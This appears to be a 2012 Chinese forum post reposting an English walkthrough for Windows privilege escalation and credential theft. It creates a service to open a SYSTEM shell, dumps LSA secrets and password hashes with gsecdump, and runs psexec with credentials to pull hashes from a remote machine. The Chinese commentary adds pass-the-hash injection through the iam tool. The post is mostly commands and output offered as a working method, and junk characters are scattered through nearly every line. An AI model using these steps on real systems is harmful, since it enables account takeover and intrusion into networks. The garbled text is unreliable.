o get a DOS Prompt as NT system:
3 m4 k4 U+ [; Q, B" G4 l+ t& o7 n: H f, [- ?# I# W" C/ a
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
* S, `) C6 N+ U[SC] CreateService SUCCESS W! q; t# B( L. p
; @; G# M, t& }9 L
C:\>sc start shellcmdline
C# s J% j. U4 T4 S, ?[SC] StartService FAILED 1053:
8 ~1 W( H* O9 m" |
3 X# v+ o% ^. w1 IThe service did not respond to the start or control request in a timely fashion.
6 X8 I/ K9 O. T5 Q0 O( q
0 g7 T7 s# f! TC:\>sc delete shellcmdline6 m4 z" g- j6 r, o6 N1 q
[SC] DeleteService SUCCESS: ?6 N o4 I* i- j
/ M/ J/ ?, g. M3 g6 o( a$ C4 r------------# S8 ]1 b @, i( ^7 ]1 i) { ?
]* X: w" `/ nThen in the new DOS window:' w+ p: t" H2 u
. c% O( z6 X7 I( k: l& xMicrosoft Windows XP [Version 5.1.2600]
& n. i$ X4 Z5 n& W/ d(C) Copyright 1985-2001 Microsoft Corp./ A# |/ L: ]4 l! K; [
" b. }9 t( `! B" r! p6 p. n/ UC:\WINDOWS\system32>whoami" [ U* R% l; d' \/ V$ X
NT AUTHORITY\SYSTEM
1 _; \. X' G, }( D- `$ \. V! U, s" U) L+ e
C:\WINDOWS\system32>gsecdump -h
# Q5 n: J3 x- i) L! x9 Z6 z1 Sgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)/ B# C- ` h& {0 w X! D
usage: gsecdump [options]
" L- m* u. u# g6 [ D
+ C: |! B7 G! Koptions:
. e0 g$ A5 M( B, e+ ^% ]-h [ --help ] show help1 f8 j" `+ @* u/ e7 J% K# T* b: a2 a/ P
-a [ --dump_all ] dump all secrets
% a/ p1 c; l7 x. p) z-l [ --dump_lsa ] dump lsa secrets/ ?7 k! F7 ]6 O( y0 [ T2 T
-w [ --dump_wireless ] dump microsoft wireless connections
& P& ?- x; q6 y6 b$ A0 \-u [ --dump_usedhashes ] dump hashes from active logon sessions g( h h1 ?4 G
-s [ --dump_hashes ] dump hashes from SAM/AD
Y0 h- v* l# P' I% ~: E- a6 {! t. C3 Y% y
Although I like to use:/ i- K% [8 ]/ P0 H% Y6 K
; D" T3 e4 c) K- {. q& t7 \PsExec v1.83 - Execute processes remotely) }1 C9 x5 [+ x ^ f* P2 u
Copyright (C) 2001-2007 Mark Russinovich: b2 R7 `1 k3 L$ l! k0 d* l8 ~0 \
Sysinternals - 链接标记[url]www.sysinternals.com[/url]( n( w6 Q/ Z5 U8 ?& f
8 ?9 M/ z4 i- k; e( F
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
G: f8 _* y) W2 v' r- ]$ l2 g0 Y5 R2 a1 f) I- W$ ]
to get the hashes from active logon sessions of a remote system.
9 |$ n- u$ w( Q3 Q/ Z- z* J+ a5 A9 U1 m" E$ \
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
" E: S/ [. G" j# E1 k0 A5 s
4 d6 t4 S0 \; T: r5 r7 q; L5 P5 F, c提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.2 n0 o F1 @6 c
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
4 \' R( v( f* q: J9 {
; u$ p# t0 k- r6 j/ R3 k: n0 M4 r我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
6 B7 ]! R4 i* M( P9 C8 y' Z' q- } G |
发表于 2012-11-6 21:09:29
收藏
支持
反对